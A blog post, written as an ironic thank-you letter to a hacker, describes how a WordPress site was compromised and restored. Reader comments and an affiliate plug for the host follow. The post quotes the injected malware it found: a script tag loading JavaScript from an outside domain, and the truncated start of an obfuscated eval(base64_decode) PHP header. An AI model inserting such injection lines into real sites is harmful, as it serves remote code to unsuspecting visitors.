My Hacker Thank You Note

Dear Hacker,

Last Saturday, I finally figured that my blog was hacked. Initially, I was pretty upset. You see, I just hit the one year mark for my blog. I was excited, happy, proud of my accomplishment, and was throwing a giveaway to thank my readers. I really didn’t have time to troubleshoot your embedded code surprise. But stepping back, I actually realized I should be thanking you.

Don’t Ignore Symptoms

On Wednesday, I was making my rounds commenting when I noticed their Comluv plugins were all failing. I just assumed Comluv was having issues because this has happened before. On Thursday, I noticed my Yakezie Blog Network listing wasn’t updating with my latest post. What on Earth is going on? No big deal. I put it on the backburner because I had to prepare for my giveaway launch on Friday.

Open Your Eyes

Whew. With the giveaway in full gear, I went back to making my rounds. But the Comluv plugins were still failing three days later. My WordPress admin pages were also displaying in an un-useable format. This is too strange. I finally opened my eyes and saw XML errors. That’s when I realized nothing is wrong with Comluv. Something was wrong with my RSS feed. That’s why the Yakezie directory wasn’t updating either as it taps my RSS feed to list my most recent post. I drilled deeper and my RSS feed looked like an unformatted scramble of my posts. I was so focused on my giveaway, I went on a wild goose chase and started modifying my giveaway post. Everything was fine before this post, it has to be this post, right? I removed a copyright symbol. I removed another uncommon formatting code. No dice. I clicked through my RSS feed again and finally noticed this code at the end of my feed.

<script src=”http://sweepstakesandcontestsinfo.com/js.php?s=1″></script>

First Attempt

I logged into my site and dug around my root php files. I then found this on the top of a few pages.  The code has been shortened as it wraps around almost 100 times.

<?php /**/ eval(base64_decode>

After Yakezie’s hosting company was hacked a few weeks ago, I backed up my files. As an experiment, I copied my old WordPress files back to my site. Ironically, they did not overwrite the files so I had two copies. I then deleted the hacked files. My heart dropped as my blog loaded the infamous error message, “Page cannot be found.” I quickly restored back to the hacked files and my blog came back up. I can’t function without my admin pages or an unreadable RSS feed. Looking through my WordPress directories, the above code was on every PHP file, including sub directories! I waved my white flag and contacted iPage tech support.

Final Thoughts

I described my issues and they escalated to their specialist. Tech support recommended I change my passwords to strong passwords and check my control panel for status updates. After about an hour, I was updated that my page was restored. Thumbs up for iPage! My RSS feed checked out and my admin pages were back online. To conclude, although my WordPress password is strong, I forgot to strengthen my iPage admin password when I created my blog a year ago. This has access to my FTP site and an open door to all my files.

I also need to re-evaluate my backup, restore procedures. I have my files backed up, but it did me no good when it came to restore. You know what they say, your backups are only good, AFTER a restore. I am backing up my post, comment data, and my database, but my WordPress file backup failed me. I will use strong passwords from now on. I thought it couldn’t happen to me. It happened to me. If you were like other hackers, you could have went medieval on me, deleted my files or rendered my blog useless with a spinning animated gif. You instead slapped me on the wrist by embedding your code in my WordPress files. Your kung-fu is the best and I received my wakeup call.

Sincerely,
Buck

P.S. If you’re shopping around for a webhost, I may be biased, but iPage stepped up in my moment of need. For more information, feel free to click on my affiliate link below. Finally, who needs Scully and Mulder when you have The Lone Gunmen!

Disclosure: We are a professional review site that receives compensation from the companies whose products we review. We test each product thoroughly and give high marks to only the very best. We are independently owned and the opinions expressed here are our own.

affiliate_link

47 thoughts on “My Hacker Thank You Note”

    1. I totally agree. They could be so useful in the right situation. I have heard of companies hiring hackers to test their security. Strange but smart really. This is probably the only situation where being a crook might actually pay off.

      Sorry to hear you had to deal with all of this nonsense. Glad you got back on your feet quick though.

  1. Sorry to hear your site was hack Buck. I’m glad everything’s back to normal. Also, don’t use the same password for different aspects of your blog – twitter, fb, email etc.

    If one is compromised, you won’t lose them all.

  2. Thanks for devoting a whole post to me (the hacker). :) Just kidding. I am actually still getting the kinks worked out with my backup process. This is just a reminder that I need to do it sooner rather than later.

  3. People are so caught with everything today they barely allot time to do stuff for the rainy days. And with rainy days, we meant data back-ups. What most people doesn’t realize is the fact everything’s done with a computer, and if the PC’s files aren’t backed-up, they will be gone forever.

  4. Luckily I have passwords that are crazy strong. Random assortments of letters, numbers, and special characters do the trick.

    With that being said, get the WP Firewall plugin. After downloading that, I’ve realized that my site is targeted for SQL injection attacks on pretty much a daily basis.

  5. I hate that hackers feel the need to waste their time like this! I wouldn’t have even gotten to the point of looking around at my files – wouldn’t know what to look for.

    It’s a good thing you had enough knowledge to get tech support going in the right direction!

  6. I was very sorry to hear that your blog was hacked but felt happy that the hacker had enough problems to deal with. :-) This blog post has taught me a bitter lesson that one must not keep any password but must try to make it stronger.

  7. Hackers are thieves and are looking for information. They create chaos because they want access to your information. Strong passwords is just the first step! I am amping up my passwords and security.

  8. That sounds like great service on the part of the hosting company. I would have been pissed off and a little freaked out if that had happened to me. Thanks for reminding us of the importance of backups as well…

  9. I’m so glad you got it all sorted out. I know completely how stressful that is. It’s a time leech trying to get hacks fixed but it’s such a relief when things are back up and running! -Sydney

  10. The first time I got hacked Google marked my site as suspicious and I ignored it for a bit because I was busy. That was a mistake! Now I know when I see any little suspicious thing, I have to dig into it right away.
    The host is always the first point of contact. They were very helpful when I had my issue as well.

  11. Wow, what a PITA! Glad you fixed it. Maybe we should regularly change passwords every couple months or so.

    Bummer bad stuff happens.

    And just for the record, InMotion Hosting got hacked and not Yakezie.com. Either way, still sucks site went down that day.

    My CLuv NEVER works so I took it off.

  12. Bad things always seem to happen at the worst possible time….
    Glad you got it all fixed up.

    I happened on a site once – just browsing some financial sites – that started throwing up a bunch of windows. I hopped off my connection but the damage was done, my pc was attacked. The hacker code hid all my files, messed up my windows 7 update and various other fun things. No fun recovering from that!

  13. It is sad hearing that your site was hacked. I am happy that you have solved the issues… What I don’t understand with these hackers are the time they spend for trying to hack. Anyway, I believe that we all have to be aware of these things. What I do is to habitually change my password.

  14. OMG! As I am prepearing for a comeback with a brand new site, this post freaked me out BIG TIME! I am not savvy with ANY codes and I wonder if I would ever notice what you just described. How scary! Thank you for posting all the details. Excellent post!

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Protected by WP Anti Spam